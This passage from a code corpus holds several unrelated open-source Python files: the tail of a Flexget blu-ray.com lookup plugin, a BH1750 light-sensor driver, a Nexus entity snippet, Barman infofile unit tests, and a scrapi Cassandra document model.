    genres = association_proxy('_genres', 'name')
    updated = Column(DateTime, default=datetime.now, nullable=False)

    def __init__(self, title, year):
        # Searches blu-ray.com for *title* (optionally constrained by
        # *year*) and scrapes the first matching release's detail page.
        # Raises LookupError when nothing matches or the request fails.
        if year:
            title_year = '{} ({})'.format(title, year)
        else:
            title_year = title
        params = {
            'section': 'bluraymovies',
            'country': 'ALL',
            'keyword': title,
            '_': str(int(time.time() * 1000))  # cache-busting timestamp
        }
        country_params = {'_': params['_']}
        try:
            search_results = bluray_request('quicksearch/search.php', **params)['items']
            countries = bluray_request('countries.json.php', **country_params) or {}

            if not search_results:
                raise LookupError('No search results found for {} on blu-ray.com'.format(title_year))

            # Earliest release first.
            search_results = sorted(search_results, key=lambda k: extract_release_date(k.get('reldate')))
        except requests.RequestException as e:
            raise LookupError('Error searching for {} on blu-ray.com: {}'.format(title_year, e))

        # Simply take the first result unless year does not match
        for result in search_results:
            if year and str(year) != result['year']:
                continue

            # Remote id is embedded in the detail-page URL.
            self.id = int(result['url'].split('/')[-2])
            self.name = result['title']

            flag = result['flag']
            country_code = flag.split('/')[-1].split('.')[0].lower()  # eg. http://some/url/UK.png -> uk
            # find country based on flag url, default United States
            country = 'United States'
            for c in countries['countries']:
                if c['c'].lower() == country_code:
                    country = c['n']
            self.country = country
            self.release_date = extract_release_date(result.get('reldate'))
            self.bluray_rating = int(result['rating']) if result['rating'] else None

            # Used for parsing some more data, sadly with soup
            self.url = result['url']
            movie_info_response = requests.get(self.url).content
            movie_info = get_soup(movie_info_response)

            # runtime and rating, should be the last span tag with class subheading
            bluray_info = movie_info.find('div', attrs={'class': 'bluray'})
            bluray_info = bluray_info.find_all('span', attrs={'class': 'subheading'})[-1].text.split('|')
            self.studio = bluray_info[0].strip()
            for info in bluray_info[1:]:
                if 'min' in info:
                    self.runtime = int(info.replace('min', '').strip())
                elif 'Rated' in info:
                    self.certification = info.replace('Rated', '').strip()

            # rating
            rating_tag = movie_info.find('div', id='ratingscore')
            self.rating = float(rating_tag.text.strip()) if rating_tag else None

            # Third onecol_content contains some information we want
            onecol_content = movie_info.find_all('div', attrs={'class': 'onecol_content'})[2]

            # overview, genres etc
            contents = onecol_content.find('div').find('div')
            overview_tag = contents.find('p')
            self.overview = overview_tag.text.strip() if overview_tag else None

            # genres
            # NOTE(review): this local shadows the module-level
            # genres_table SQLAlchemy Table inside this method.
            genres_table = contents.find('table')
            if not genres_table:
                break
            genres_content = genres_table.find_all('tr')
            if not genres_content:
                break
            genres = set()
            for genre in genres_content:
                genres.add(genre.find('td').text.strip())
            self._genres = [BlurayGenre(name=genre) for genre in genres]
            break
        else:
            # Loop exhausted without a year match.
            raise LookupError('No search results found for {} on blu-ray.com'.format(title_year))
class BlurayGenre(Base):
    """Genre name; many-to-many with BlurayMovie via genres_table."""
    __tablename__ = 'bluray_genres'

    name = Column(Unicode, primary_key=True, nullable=False)
class BluraySearchResult(Base):
    """Maps a lower-cased search string to the movie it resolved to."""
    __tablename__ = 'bluray_search_results'

    search = Column(Unicode, primary_key=True)
    movie_id = Column(Integer, ForeignKey('bluray_movies.id'), nullable=True)
    movie = relation(BlurayMovie)

    def __init__(self, search, movie_id=None, movie=None):
        # Search strings are stored case-insensitively.
        self.search = search.lower()
        if movie_id:
            self.movie_id = movie_id
        if movie:
            self.movie = movie
class ApiBluray(object):
    """Does lookups to Blu-ray.com and provides movie information. Caches lookups."""

    @staticmethod
    def lookup(title=None, year=None, only_cached=False, session=None):
        """Return a BlurayMovie for *title* (+ optional *year*).

        Checks the DB cache first (by name, then by stored search
        string); cache entries expire faster for recent releases.
        Raises LookupError when nothing is found, or when only_cached
        is set and the movie is not cached.
        """
        if not title:
            raise LookupError('No criteria specified for blu-ray.com lookup')
        title_year = title + ' ({})'.format(year) if year else title
        movie_filter = session.query(BlurayMovie).filter(func.lower(BlurayMovie.name) == title.lower())
        if year:
            movie_filter = movie_filter.filter(BlurayMovie.year == year)
        movie = movie_filter.first()
        if not movie:
            # Fall back to previously stored search-string mappings.
            found = session.query(BluraySearchResult). \
                filter(BluraySearchResult.search == title_year.lower()).first()
            if found and found.movie:
                movie = found.movie

        if movie:
            # Movie found in cache, check if cache has expired. Shamefully stolen from api_tmdb
            refresh_time = timedelta(days=2)
            if movie.release_date:
                if movie.release_date > datetime.now().date() - timedelta(days=7):
                    # Movie is less than a week old, expire after 1 day
                    refresh_time = timedelta(days=1)
                else:
                    # Older movies refresh progressively less often.
                    age_in_years = (datetime.now().date() - movie.release_date).days / 365
                    refresh_time += timedelta(days=age_in_years * 5)
            if movie.updated < datetime.now() - refresh_time and not only_cached:
                log.debug('Cache has expired for %s, attempting to refresh from blu-ray.com.', movie.name)
                try:
                    updated_movie = BlurayMovie(title=title, year=year)
                except LookupError as e:
                    # Refresh failure is non-fatal; keep the stale copy.
                    log.error('Error refreshing movie details for %s from blu-ray.com, cached info being used. %s',
                              title, e)
                else:
                    movie = session.merge(updated_movie)
            else:
                log.debug('Movie %s information restored from cache.', movie.name)
        else:
            if only_cached:
                raise LookupError('Movie %s not found from cache' % title_year)
            # There was no movie found in the cache, do a lookup from blu-ray.com
            log.verbose('Searching from blu-ray.com `%s`', title)

            # Add/merge movie to db
            movie = BlurayMovie(title=title, year=year)

            # Add to search results table if necessary
            if title.lower() != movie.name.lower():
                session.add(BluraySearchResult(search=title_year.lower(), movie_id=movie.id))

            session.merge(movie)

        if not movie:
            raise LookupError('Unable to find movie on blu-ray: {}'.format(title_year))

        return movie
@event('plugin.register')
def register_plugin():
    # Internal API plugin: no task-phase interfaces are exposed.
    plugin.register(ApiBluray, 'api_bluray', api_ver=2, interfaces=[])
| qk4l/Flexget | flexget/plugins/internal/api_bluray.py | Python | mit | 9,392 |
#!/usr/bin/python
# ---------------------------------------------------------------------
# ___ ___ _ ____
# / _ \/ _ \(_) __/__ __ __
# / , _/ ___/ /\ \/ _ \/ // /
# /_/|_/_/ /_/___/ .__/\_, /
# /_/ /___/
#
# bh1750.py
# Read data from a BH1750 digital light sensor.
#
# Author : Matt Hawkins
# Date : 26/06/2018
#
# For more information please visit :
# https://www.raspberrypi-spy.co.uk/?s=bh1750
#
# ---------------------------------------------------------------------
try:
import smbus
except:
smbus = None
import time
from threading import Lock
# Module-wide lock serialising access to the shared I2C bus.
bh_lock = Lock()
class BH1750:
    """Minimal driver for the BH1750 ambient light sensor over I2C."""

    DEVICE = 0x23  # Default device I2C address

    POWER_DOWN = 0x00  # No active state
    POWER_ON = 0x01  # Power on
    RESET = 0x07  # Reset data register value

    # Start measurement at 4lx resolution. Time typically 16ms.
    CONTINUOUS_LOW_RES_MODE = 0x13
    # Start measurement at 1lx resolution. Time typically 120ms
    CONTINUOUS_HIGH_RES_MODE_1 = 0x10
    # Start measurement at 0.5lx resolution. Time typically 120ms
    CONTINUOUS_HIGH_RES_MODE_2 = 0x11
    # Start measurement at 1lx resolution. Time typically 120ms
    # Device is automatically set to Power Down after measurement.
    ONE_TIME_HIGH_RES_MODE_1 = 0x20
    # Start measurement at 0.5lx resolution. Time typically 120ms
    # Device is automatically set to Power Down after measurement.
    ONE_TIME_HIGH_RES_MODE_2 = 0x21
    # Start measurement at 1lx resolution. Time typically 120ms
    # Device is automatically set to Power Down after measurement.
    ONE_TIME_LOW_RES_MODE = 0x23

    if smbus:
        # bus = smbus.SMBus(0)  # Rev 1 Pi uses 0
        bus = smbus.SMBus(1)  # Rev 2 Pi uses 1
    else:
        # smbus unavailable (e.g. developing off-Pi): readLight returns 0.
        bus = None

    def __init__(self, **kwargs):
        pass

    def convertToNumber(self, data):
        """Convert a 2-byte [high, low] sensor reading to lux.

        Returns 0 when *data* is empty/None.  (The original comment
        mentioned an optional 'decimals' parameter that never existed;
        rounding is left to the caller.)
        """
        if data:
            result = (data[1] + (256 * data[0])) / 1.2
        else:
            result = 0
        return result

    def readLight(self, addr=DEVICE):
        """Trigger a one-shot high-res measurement and return the lux value."""
        # BUG FIX: hold the lock inside try/finally so an I2C error can
        # no longer leave bh_lock permanently acquired (which would
        # deadlock every subsequent reader).
        bh_lock.acquire()
        try:
            if self.bus:
                data = self.bus.read_i2c_block_data(addr, BH1750.ONE_TIME_HIGH_RES_MODE_1)
            else:
                data = None
        finally:
            bh_lock.release()
        return self.convertToNumber(data)
def main():
    # Demo loop: poll the sensor twice a second and print the reading.
    # Runs until interrupted (Ctrl-C).
    bh = BH1750()
    while True:
        lightLevel = bh.readLight()
        print("Light Level : " + format(lightLevel, '.2f') + " lx")
        time.sleep(0.5)

if __name__ == "__main__":
    main()
| ThomasHangstoerfer/pyHomeCtrl | bh1750.py | Python | apache-2.0 | 2,676 |
# The Nexus software is licensed under the BSD 2-Clause license.
#
# You should have recieved a copy of this license with the software.
# If you did not, you can find one at the following link.
#
# http://opensource.org/licenses/bsd-license.php
# Executed by the server's entity-creation hook: 'entitylist', the spawn
# coordinates (x, y, z) and 'self.client' are injected by the caller
# before this snippet runs (none are defined in this file).
# Entry layout appears to be [name, (x, y, z), var1, var2, extra] --
# TODO confirm against the entity engine.
entitylist.append(["testbow",(x,y,z),8,8,None])
self.client.sendServerMessage("A testbow has been created.")
| TheArchives/Nexus | core/entities/testbow_create.py | Python | bsd-2-clause | 356 |
# Copyright (C) 2013-2016 2ndQuadrant Italia Srl
#
# This file is part of Barman.
#
# Barman is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Barman is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Barman. If not, see <http://www.gnu.org/licenses/>.
import json
import os
from datetime import datetime
import mock
import pytest
from dateutil.tz import tzlocal, tzoffset
from barman.infofile import (BackupInfo, Field, FieldListFile, WalFileInfo,
load_datetime_tz)
from testing_helpers import build_mocked_server
# Literal backup.info content (key=value lines) used as a fixture by
# tests in this module.
BASE_BACKUP_INFO = """backup_label=None
begin_offset=40
begin_time=2014-12-22 09:25:22.561207+01:00
begin_wal=000000010000000000000004
begin_xlog=0/4000028
config_file=/fakepath/postgresql.conf
end_offset=184
end_time=2014-12-22 09:25:27.410470+01:00
end_wal=000000010000000000000004
end_xlog=0/40000B8
error=None
hba_file=/fakepath/pg_hba.conf
ident_file=/fakepath/pg_ident.conf
mode=default
pgdata=/fakepath/data
server_name=fake-9.4-server
size=20935690
status=DONE
tablespaces=[('fake_tbs', 16384, '/fake_tmp/tbs')]
timeline=1
version=90400"""
def test_load_datetime_tz():
    """
    Unit test for load_datetime_tz function

    This test covers all load_datetime_tz code with correct parameters
    and checks that a ValueError is raised when called with a bad parameter.
    """
    # A timestamp without timezone info is interpreted in the local tz
    naive_result = load_datetime_tz("2012-12-15 10:14:51.898000")
    assert naive_result == datetime(2012, 12, 15, 10, 14, 51, 898000,
                                    tzinfo=tzlocal())

    # A timestamp carrying an explicit offset keeps that offset
    aware_result = load_datetime_tz("2012-12-15 10:14:51.898000 +0100")
    assert aware_result == datetime(2012, 12, 15, 10, 14, 51, 898000,
                                    tzinfo=tzoffset('GMT+1', 3600))

    # Garbage input must raise ValueError
    with pytest.raises(ValueError):
        load_datetime_tz("Invalid datetime")
# noinspection PyMethodMayBeStatic
class TestField(object):
    """Unit tests for the infofile.Field descriptor."""

    def test_field_creation(self):
        field = Field('test_field')
        assert field

    def test_field_with_arguments(self):
        # All constructor arguments must be stored on the descriptor.
        dump_function = str
        load_function = int
        default = 10
        docstring = 'Test Docstring'
        field = Field('test_field', dump_function, load_function, default,
                      docstring)
        assert field
        assert field.name == 'test_field'
        assert field.to_str == dump_function
        assert field.from_str == load_function
        assert field.default == default
        assert field.__doc__ == docstring

    def test_field_dump_decorator(self):
        # Field.dump() is usable as a decorator to set the serialiser.
        test_field = Field('test_field')
        dump_function = str
        test_field = test_field.dump(dump_function)
        assert test_field.to_str == dump_function

    def test_field_load_decorator(self):
        # NOTE(review): this calls .dump() and checks .to_str, so it
        # duplicates the previous test instead of exercising .load() /
        # .from_str -- confirm and fix in a follow-up.
        test_field = Field('test_field')
        load_function = int
        test_field = test_field.dump(load_function)
        assert test_field.to_str == load_function
class DummyFieldListFile(FieldListFile):
    # Minimal FieldListFile subclass used as a fixture by the tests below.
    dummy = Field('dummy', dump=str, load=int, default=12, doc='dummy_field')
# noinspection PyMethodMayBeStatic
class TestFieldListFile(object):
    """Unit tests for FieldListFile via the DummyFieldListFile fixture."""

    def test_field_list_file_creation(self):
        # Unknown keyword arguments must be rejected.
        with pytest.raises(AttributeError):
            FieldListFile(test_argument=11)
        field = FieldListFile()
        assert field

    def test_subclass_creation(self):
        # Subclass honours declared defaults and keyword overrides.
        with pytest.raises(AttributeError):
            DummyFieldListFile(test_argument=11)
        field = DummyFieldListFile()
        assert field
        assert field.dummy == 12
        field = DummyFieldListFile(dummy=13)
        assert field
        assert field.dummy == 13

    def test_subclass_access(self):
        # Fields are settable but not deletable.
        dummy = DummyFieldListFile()
        dummy.dummy = 14
        assert dummy.dummy == 14
        with pytest.raises(AttributeError):
            del dummy.dummy

    def test_subclass_load(self, tmpdir):
        tmp_file = tmpdir.join("test_file")
        tmp_file.write('dummy=15\n')
        dummy = DummyFieldListFile()
        dummy.load(tmp_file.strpath)
        assert dummy.dummy == 15

    def test_subclass_save(self, tmpdir):
        tmp_file = tmpdir.join("test_file")
        dummy = DummyFieldListFile(dummy=16)
        dummy.save(tmp_file.strpath)
        assert 'dummy=16' in tmp_file.read()

    def test_subclass_from_meta_file(self, tmpdir):
        tmp_file = tmpdir.join("test_file")
        tmp_file.write('dummy=17\n')
        dummy = DummyFieldListFile.from_meta_file(tmp_file.strpath)
        assert dummy.dummy == 17

    def test_subclass_items(self):
        # items() yields (name, serialised-value) pairs.
        dummy = DummyFieldListFile()
        dummy.dummy = 18
        assert list(dummy.items()) == [('dummy', '18')]

    def test_subclass_repr(self):
        dummy = DummyFieldListFile()
        dummy.dummy = 18
        assert repr(dummy) == "DummyFieldListFile(dummy='18')"
# noinspection PyMethodMayBeStatic
class TestWalFileInfo(object):
def test_from_file_no_compression(self, tmpdir):
tmp_file = tmpdir.join("000000000000000000000001")
tmp_file.write('dummy_content\n')
stat = os.stat(tmp_file.strpath)
wfile_info = WalFileInfo.from_file(tmp_file.strpath)
assert wfile_info.name == tmp_file.basename
assert wfile_info.size == stat.st_size
assert wfile_info.time == stat.st_mtime
assert wfile_info.filename == '%s.meta' % tmp_file.strpath
assert wfile_info.relpath() == (
'0000000000000000/000000000000000000000001')
@mock.patch('barman.infofile.identify_compression')
def test_from_file_compression(self, id_compression, tmpdir):
# prepare
id_compression.return_value = 'test_compression'
tmp_file = tmpdir.join("000000000000000000000001")
tmp_file.write('dummy_content\n')
wfile_info = WalFileInfo.from_file(tmp_file.strpath)
assert wfile_info.name == tmp_file.basename
assert wfile_info.size == tmp_file.size()
assert wfile_info.time == tmp_file.mtime()
assert wfile_info.filename == '%s.meta' % tmp_file.strpath
assert wfile_info.compression == 'test_compression'
assert wfile_info.relpath() == (
'0000000000000000/000000000000000000000001')
@mock.patch('barman.infofile.identify_compression')
def test_from_file_default_compression(self, id_compression, tmpdir):
# prepare
id_compression.return_value = None
tmp_file = tmpdir.join("00000001000000E500000064")
tmp_file.write('dummy_content\n')
wfile_info = WalFileInfo.from_file(
tmp_file.strpath,
default_compression='test_default_compression')
assert wfile_info.name == tmp_file.basename
assert wfile_info.size == tmp_file.size()
assert wfile_info.time == tmp_file.mtime()
assert wfile_info.filename == '%s.meta' % tmp_file.strpath
assert wfile_info.compression == 'test_default_compression'
assert wfile_info.relpath() == (
'00000001000000E5/00000001000000E500000064')
@mock.patch('barman.infofile.identify_compression')
def test_from_file_override_compression(self, id_compression, tmpdir):
# prepare
id_compression.return_value = None
tmp_file = tmpdir.join("000000000000000000000001")
tmp_file.write('dummy_content\n')
wfile_info = WalFileInfo.from_file(
tmp_file.strpath,
default_compression='test_default_compression',
compression='test_override_compression')
assert wfile_info.name == tmp_file.basename
assert wfile_info.size == tmp_file.size()
assert wfile_info.time == tmp_file.mtime()
assert wfile_info.filename == '%s.meta' % tmp_file.strpath
assert wfile_info.compression == 'test_override_compression'
assert wfile_info.relpath() == (
'0000000000000000/000000000000000000000001')
    @mock.patch('barman.infofile.identify_compression')
    def test_from_file_override(self, id_compression, tmpdir):
        """Keyword arguments passed to from_file() must override the
        values derived from the file on disk (name, size, time)."""
        # prepare
        id_compression.return_value = None
        tmp_file = tmpdir.join("000000000000000000000001")
        tmp_file.write('dummy_content\n')
        # override the name: relpath must follow the overridden name
        wfile_info = WalFileInfo.from_file(
            tmp_file.strpath,
            name="000000000000000000000002")
        assert wfile_info.name == '000000000000000000000002'
        assert wfile_info.size == tmp_file.size()
        assert wfile_info.time == tmp_file.mtime()
        assert wfile_info.filename == '%s.meta' % tmp_file.strpath
        assert wfile_info.compression is None
        assert wfile_info.relpath() == (
            '0000000000000000/000000000000000000000002')
        # override the size: other fields still come from the file
        wfile_info = WalFileInfo.from_file(
            tmp_file.strpath,
            size=42)
        assert wfile_info.name == tmp_file.basename
        assert wfile_info.size == 42
        assert wfile_info.time == tmp_file.mtime()
        assert wfile_info.filename == '%s.meta' % tmp_file.strpath
        assert wfile_info.compression is None
        assert wfile_info.relpath() == (
            '0000000000000000/000000000000000000000001')
        # override the time: other fields still come from the file
        wfile_info = WalFileInfo.from_file(
            tmp_file.strpath,
            time=43)
        assert wfile_info.name == tmp_file.basename
        assert wfile_info.size == tmp_file.size()
        assert wfile_info.time == 43
        assert wfile_info.filename == '%s.meta' % tmp_file.strpath
        assert wfile_info.compression is None
        assert wfile_info.relpath() == (
            '0000000000000000/000000000000000000000001')
    def test_to_xlogdb_line(self):
        """A WalFileInfo must serialize to a tab-separated xlog.db line."""
        wfile_info = WalFileInfo()
        wfile_info.name = '000000000000000000000002'
        wfile_info.size = 42
        wfile_info.time = 43
        wfile_info.compression = None
        assert wfile_info.relpath() == (
            '0000000000000000/000000000000000000000002')
        # fields are tab separated; a None compression is rendered literally
        assert wfile_info.to_xlogdb_line() == (
            '000000000000000000000002\t42\t43\tNone\n')
    def test_from_xlogdb_line(self):
        """
        Test the conversion from an xlog.db line to a WalFileInfo object
        """
        # build a WalFileInfo object to compare against
        wfile_info = WalFileInfo()
        wfile_info.name = '000000000000000000000001'
        wfile_info.size = 42
        wfile_info.time = 43
        wfile_info.compression = None
        assert wfile_info.relpath() == (
            '0000000000000000/000000000000000000000001')
        # mock a server object
        server = mock.Mock(name='server')
        server.config.wals_directory = '/tmp/wals'
        # parse the string: the result must carry the same fields as the
        # manually-built object above
        info_file = wfile_info.from_xlogdb_line(
            '000000000000000000000001\t42\t43\tNone\n')
        assert list(wfile_info.items()) == list(info_file.items())
    def test_timezone_aware_parser(self):
        """
        Test the timezone_aware_parser method with different string
        formats (explicit offsets, ISO 8601, naive, and malformed zones)
        """
        # test case 1 string with timezone info (-0400 == -14400 seconds)
        tz_string = '2009/05/13 19:19:30 -0400'
        result = load_datetime_tz(tz_string)
        assert result.tzinfo == tzoffset(None, -14400)
        # test case 2 string with timezone info with a different format
        # (ISO 8601, -08:00 == -28800 seconds)
        tz_string = '2004-04-09T21:39:00-08:00'
        result = load_datetime_tz(tz_string)
        assert result.tzinfo == tzoffset(None, -28800)
        # test case 3 string without timezone info,
        # expecting tzlocal() as timezone
        tz_string = str(datetime.now())
        result = load_datetime_tz(tz_string)
        assert result.tzinfo == tzlocal()
        # test case 4 string with a wrong timezone format,
        # expecting tzlocal() as timezone
        tz_string = '16:08:12 05/08/03 AEST'
        result = load_datetime_tz(tz_string)
        assert result.tzinfo == tzlocal()
# noinspection PyMethodMayBeStatic
class TestBackupInfo(object):
    """Tests for BackupInfo: loading, saving, versioning and path
    resolution of backup metadata files (backup.info)."""
    def test_backup_info_from_file(self, tmpdir):
        """
        Test the initialization of a BackupInfo object
        loading data from a backup.info file
        """
        # we want to test the loading of BackupInfo data from local file.
        # So we create a file into the tmpdir containing a
        # valid BackupInfo dump
        infofile = tmpdir.join("backup.info")
        infofile.write(BASE_BACKUP_INFO)
        # Mock the server, we don't need it at the moment
        server = build_mocked_server()
        # load the data from the backup.info file
        b_info = BackupInfo(server, info_file=infofile.strpath)
        assert b_info
        assert b_info.begin_offset == 40
        assert b_info.begin_wal == '000000010000000000000004'
        assert b_info.timeline == 1
        assert isinstance(b_info.tablespaces, list)
        assert b_info.tablespaces[0].name == 'fake_tbs'
        assert b_info.tablespaces[0].oid == 16384
        assert b_info.tablespaces[0].location == '/fake_tmp/tbs'
    def test_backup_info_from_empty_file(self, tmpdir):
        """
        Test the initialization of a BackupInfo object
        loading data from an empty backup.info file
        """
        # we want to test the loading of BackupInfo data from local file.
        # So we create a file into the tmpdir containing a
        # valid BackupInfo dump
        infofile = tmpdir.join("backup.info")
        infofile.write('')
        # Mock the server, we don't need it at the moment
        server = build_mocked_server(name='test_server')
        server.backup_manager.name = 'test_mode'
        # load the data from the backup.info file: with an empty file the
        # object must still be built, taking its identity from the server
        b_info = BackupInfo(server, info_file=infofile.strpath)
        assert b_info
        assert b_info.server_name == 'test_server'
        assert b_info.mode == 'test_mode'
    def test_backup_info_from_backup_id(self, tmpdir):
        """
        Test the initialization of a BackupInfo object
        using a backup_id as argument
        """
        # We want to test the loading system using a backup_id.
        # So we create a backup.info file into the tmpdir then
        # we instruct the configuration on the position of the
        # testing backup.info file
        server = build_mocked_server(
            main_conf={
                'basebackups_directory': tmpdir.strpath
            },
        )
        infofile = tmpdir.mkdir('fake_name').join('backup.info')
        infofile.write(BASE_BACKUP_INFO)
        # Load the backup.info file using the backup_id
        b_info = BackupInfo(server, backup_id="fake_name")
        assert b_info
        assert b_info.begin_offset == 40
        assert b_info.begin_wal == '000000010000000000000004'
        assert b_info.timeline == 1
        assert isinstance(b_info.tablespaces, list)
        assert b_info.tablespaces[0].name == 'fake_tbs'
        assert b_info.tablespaces[0].oid == 16384
        assert b_info.tablespaces[0].location == '/fake_tmp/tbs'
    def test_backup_info_save(self, tmpdir):
        """
        Test the save method of a BackupInfo object
        """
        # Check the saving method.
        # Load a backup.info file, modify the BackupInfo object
        # then save it.
        server = build_mocked_server(
            main_conf={
                'basebackups_directory': tmpdir.strpath
            },
        )
        backup_dir = tmpdir.mkdir('fake_name')
        infofile = backup_dir.join('backup.info')
        b_info = BackupInfo(server, backup_id="fake_name")
        b_info.status = BackupInfo.FAILED
        b_info.save()
        # read the file looking for the modified line
        for line in infofile.readlines():
            if line.startswith("status"):
                assert line.strip() == "status=FAILED"
    def test_backup_info_version(self, tmpdir):
        """
        Simple test for backup_version management: a 'data' subdirectory
        marks a v2 backup, a 'pgdata' subdirectory marks a v1 backup.
        """
        server = build_mocked_server(
            main_conf={
                'basebackups_directory': tmpdir.strpath
            },
        )
        # new version
        backup_dir = tmpdir.mkdir('fake_backup_id')
        backup_dir.mkdir('data')
        backup_dir.join('backup.info')
        b_info = BackupInfo(server, backup_id="fake_backup_id")
        assert b_info.backup_version == 2
        # old version
        backup_dir = tmpdir.mkdir('another_fake_backup_id')
        backup_dir.mkdir('pgdata')
        backup_dir.join('backup.info')
        b_info = BackupInfo(server, backup_id="another_fake_backup_id")
        assert b_info.backup_version == 1
    def test_data_dir(self, tmpdir):
        """
        Simple test for the method that is responsible of the build of the
        path to the datadir and to the tablespaces dir according
        with backup_version
        """
        server = build_mocked_server(
            main_conf={
                'basebackups_directory': tmpdir.strpath
            },
        )
        # Build a fake v2 backup
        backup_dir = tmpdir.mkdir('fake_backup_id')
        data_dir = backup_dir.mkdir('data')
        info_file = backup_dir.join('backup.info')
        info_file.write(BASE_BACKUP_INFO)
        b_info = BackupInfo(server, backup_id="fake_backup_id")
        # Check that the paths are built according with version:
        # v2 keeps tablespaces as siblings of the data directory
        assert b_info.backup_version == 2
        assert b_info.get_data_directory() == data_dir.strpath
        assert b_info.get_data_directory(16384) == (backup_dir.strpath +
                                                    '/16384')
        # Build a fake v1 backup
        backup_dir = tmpdir.mkdir('another_fake_backup_id')
        pgdata_dir = backup_dir.mkdir('pgdata')
        info_file = backup_dir.join('backup.info')
        info_file.write(BASE_BACKUP_INFO)
        b_info = BackupInfo(server, backup_id="another_fake_backup_id")
        # Check that the paths are built according with version:
        # v1 keeps tablespaces under pgdata/pg_tblspc
        assert b_info.backup_version == 1
        assert b_info.get_data_directory(16384) == \
            backup_dir.strpath + '/pgdata/pg_tblspc/16384'
        assert b_info.get_data_directory() == pgdata_dir.strpath
        # Check that an exception is raised if an invalid oid
        # is provided to the method
        with pytest.raises(ValueError):
            b_info.get_data_directory(12345)
        # Check that a ValueError exception is raised with an
        # invalid oid when the tablespaces list is None
        b_info.tablespaces = None
        # and expect a value error
        with pytest.raises(ValueError):
            b_info.get_data_directory(16384)
    def test_to_json(self, tmpdir):
        """A BackupInfo must be serializable to JSON via to_json()."""
        server = build_mocked_server(
            main_conf={
                'basebackups_directory': tmpdir.strpath
            },
        )
        # Build a fake backup
        backup_dir = tmpdir.mkdir('fake_backup_id')
        info_file = backup_dir.join('backup.info')
        info_file.write(BASE_BACKUP_INFO)
        b_info = BackupInfo(server, backup_id="fake_backup_id")
        # This call should not raise
        assert json.dumps(b_info.to_json())
    def test_from_json(self, tmpdir):
        """to_json()/from_json() must round-trip a BackupInfo object."""
        server = build_mocked_server(
            main_conf={
                'basebackups_directory': tmpdir.strpath
            },
        )
        # Build a fake backup
        backup_dir = tmpdir.mkdir('fake_backup_id')
        info_file = backup_dir.join('backup.info')
        info_file.write(BASE_BACKUP_INFO)
        b_info = BackupInfo(server, backup_id="fake_backup_id")
        # Build another BackupInfo from the json dump
        new_binfo = BackupInfo.from_json(server, b_info.to_json())
        assert b_info.to_dict() == new_binfo.to_dict()
| hareevs/pgbarman | tests/test_infofile.py | Python | gpl-3.0 | 19,981 |
from __future__ import absolute_import
import json
import logging
from uuid import uuid4
from dateutil.parser import parse
from cassandra.cqlengine import columns, models
# from scrapi import events
# from scrapi import database # noqa
# from scrapi.util import copy_to_unicode
# from scrapi.processing.base import BaseProcessor
# logger = logging.getLogger(__name__)
# logging.getLogger('cqlengine.cql').setLevel(logging.WARN)
#
#
# class CassandraProcessor(BaseProcessor):
# '''
# Cassandra processor for scrapi. Handles versioning and storing documents in Cassandra
# '''
# NAME = 'cassandra'
#
# @events.logged(events.PROCESSING, 'normalized.cassandra')
# def process_normalized(self, raw_doc, normalized):
# self.send_to_database(
# source=copy_to_unicode(raw_doc['source']),
# docID=copy_to_unicode(raw_doc['docID']),
# contributors=copy_to_unicode(json.dumps(normalized['contributors'])),
# description=copy_to_unicode(normalized.get('description')),
# uris=copy_to_unicode(json.dumps(normalized['uris'])),
# providerUpdatedDateTime=parse(normalized['providerUpdatedDateTime']),
# freeToRead=copy_to_unicode(json.dumps(normalized.get('freeToRead', {}))),
# languages=normalized.get('language'),
# licenses=copy_to_unicode(json.dumps(normalized.get('licenseRef', []))),
# publisher=copy_to_unicode(json.dumps(normalized.get('publisher', {}))),
# sponsorships=copy_to_unicode(json.dumps(normalized.get('sponsorship', []))),
# title=copy_to_unicode(normalized['title']),
# version=copy_to_unicode(json.dumps(normalized.get('version'), {})),
# otherProperties=copy_to_unicode(json.dumps(normalized.get('otherProperties', {}))),
# shareProperties=copy_to_unicode(json.dumps(normalized['shareProperties']))
# ).save()
#
# @events.logged(events.PROCESSING, 'raw.cassandra')
# def process_raw(self, raw_doc):
# self.send_to_database(**raw_doc.attributes).save()
#
# def send_to_database(self, docID, source, **kwargs):
# documents = DocumentModel.objects(docID=docID, source=source)
# if documents:
# document = documents[0]
# if self.different(dict(document), dict(docID=docID, source=source, **kwargs)):
# # Create new version, get UUID of new version, update
# versions = document.versions + kwargs.pop('versions', [])
# version = VersionModel(key=uuid4(), **dict(document))
# version.save()
# versions.append(version.key)
# return document.update(versions=versions, **kwargs)
# else:
#             raise events.Skip("No changes detected for document with ID {0} and source {1}.".format(docID, source))
# else:
# # create document
# return DocumentModel.create(docID=docID, source=source, **kwargs)
#
# def different(self, old, new):
# try:
# return not all([new[key] == old[key] or (not new[key] and not old[key]) for key in new.keys() if key != 'timestamps'])
# except Exception:
# return True # If the document fails to load/compare for some reason, accept a new version
#
#
# @database.register_model
class DocumentModel(models.Model):
    '''
    Defines the schema for a metadata document in cassandra

    The schema contains denormalized raw document, denormalized
    normalized (so sorry for the terminology clash) document, and
    a list of version IDs that refer to previous versions of this
    metadata.
    '''
    __table_name__ = 'documents'
    # Raw: fields taken verbatim from the harvested source document.
    # Composite primary key: (docID, source), clustered by source DESC.
    docID = columns.Text(primary_key=True)
    source = columns.Text(primary_key=True, clustering_order="DESC")
    doc = columns.Bytes()
    filetype = columns.Text()
    timestamps = columns.Map(columns.Text, columns.Text)
    # Normalized: many fields are stored as JSON-encoded text blobs
    # (marked TODO below, pending proper column types).
    uris = columns.Text()
    title = columns.Text()
    contributors = columns.Text()  # TODO
    providerUpdatedDateTime = columns.DateTime()
    description = columns.Text()
    freeToRead = columns.Text()  # TODO
    languages = columns.List(columns.Text())
    licenses = columns.Text()  # TODO
    publisher = columns.Text()  # TODO
    subjects = columns.List(columns.Text())
    tags = columns.List(columns.Text())
    sponsorships = columns.Text()  # TODO
    version = columns.Text()  # TODO
    otherProperties = columns.Text()  # TODO
    shareProperties = columns.Text()  # TODO
    # Additional metadata: keys of earlier snapshots in the versions table
    versions = columns.List(columns.UUID)
#
# @database.register_model
# class VersionModel(models.Model):
# '''
# Defines the schema for a version of a metadata document in Cassandra
#
# See the DocumentModel class. This schema is very similar, except it is
# keyed on a UUID that is generated by us, rather than it's own metadata
# '''
